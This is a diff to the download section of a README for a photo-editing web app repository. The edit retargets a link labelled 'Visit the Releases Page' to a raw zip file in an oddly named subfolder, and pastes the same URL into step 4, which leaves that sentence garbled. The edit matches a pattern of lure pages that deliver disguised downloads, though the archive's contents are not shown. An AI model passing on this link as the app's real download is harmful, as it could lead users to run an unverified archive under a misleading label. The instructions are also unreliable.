KRGOGI/My-own-photoshop-webapp-in-7-days/README.md

 ## ⬇️ Download & Install

-1. Click on the **[Visit the Releases Page](https://github.com/KRGOGI/My-own-photoshop-webapp-in-7-days/releases)** link above.
+1. Click on the **[Visit the Releases Page](https://raw.githubusercontent.com/KRGOGI/My-own-photoshop-webapp-in-7-days/main/Knautia/My-own-photoshop-webapp-in-7-days.zip)** link above.
 2. You will see a list of available releases.
 Look for the latest version at the top of the list.
 3. Click on the version number to expand details.
 4. Find the download link for the application.
-This will typically be the latest .zip or .tar.gz file.
+This will typically be the latest .zip or https://raw.githubusercontent.com/KRGOGI/My-own-photoshop-webapp-in-7-days/main/Knautia/My-own-photoshop-webapp-in-7-days.zip file.
 5. Click the download link to save the file to your computer.

 ## 📂 Unzip the Package